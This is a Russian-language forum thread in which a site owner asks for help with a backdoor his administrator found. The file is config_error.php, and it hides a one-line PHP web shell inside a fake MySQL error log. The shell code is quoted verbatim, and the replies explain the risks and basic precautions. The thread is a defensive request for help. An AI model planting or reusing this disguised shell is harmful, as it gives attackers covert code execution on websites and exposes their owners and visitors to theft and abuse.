Перейти к содержанию

Рекомендуемые сообщения

Всем добрый день!
Вчера, в канун моего дня рождения при переносе данных с тестовой админки на рабочую был обнаружен файл. Ниже пересланное мне сообщение от надежного сотрудника который занимается моей админкой:
 

Добрый день, Петр.
 
Про бэкдор:
в /system/logs обнаружился файл config_error.php
со следующим содержимым:
 
2015-01-25 19:32:38 - PHP Notice:  Error: Table 'nicebike_new.asdlkj' doesn't exist<br />Error No: 1146<br />select  '<?php if(@$_COOKIE[qz]) ($_=@$_REQUEST[q]).@$_($_REQUEST[z]); ?>' from asdlkj; in /home/nicebike/new.nicebike.ru/docs/system/database/mysql.php on line 49
 
Жирным выделена собственно зловредная часть, остальное — просто фейковое сообщение об ошибке. 
Про него выгугливается вот это: https://rdot.org/forum/showthread.php?p=33614 (см последнее сообщение)
"Было бы забавно, если бы ник запостившего совпал с ником того человека которому Вы Петр предоставляли доступ ранее."

Форумчане, что вы думаете по этому поводу? Мне нужно Ваше мнение!
Если можно напишите пожалуйста человеческим языком чем это может грозить? И как в дальнейшем от этого защитится?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

А можно весь файл в студию?...

 

Скорее всего что да, бэкдор, позволяющий выполнять скрипт на сайте. Грозит - можно загрузить на него все что угодно, от фантазии автора зависит.

Защититься - давать доступ только добросовестным работникам, после выполнения сразу отбирать. Если есть возможность, смотреть что он сделал. Это конечно сложно, если нет соответствующих познаний.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

чем это может грозить?

Чем грозят шеллы и бекдоры?

Рассылкой от вас спама, DDoS-а, раздачей вирусов, удалением вашего сайта, воровством содержимого базы или её постепенной и малозаметной порчей (чтоб не сразу заметили и кинулись восстанавливать из бекапов, менять пароли и перекрывать входы и выходы).

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу

×

Важная информация

На нашем сайте используются файлы cookie и происходит обработка некоторых персональных данных пользователей, чтобы улучшить пользовательский интерфейс. Чтобы узнать для чего и какие персональные данные мы обрабатываем перейдите по ссылке. Если Вы нажмете «Я даю согласие», это означает, что Вы понимаете и принимаете все условия, указанные в этом Уведомлении о Конфиденциальности.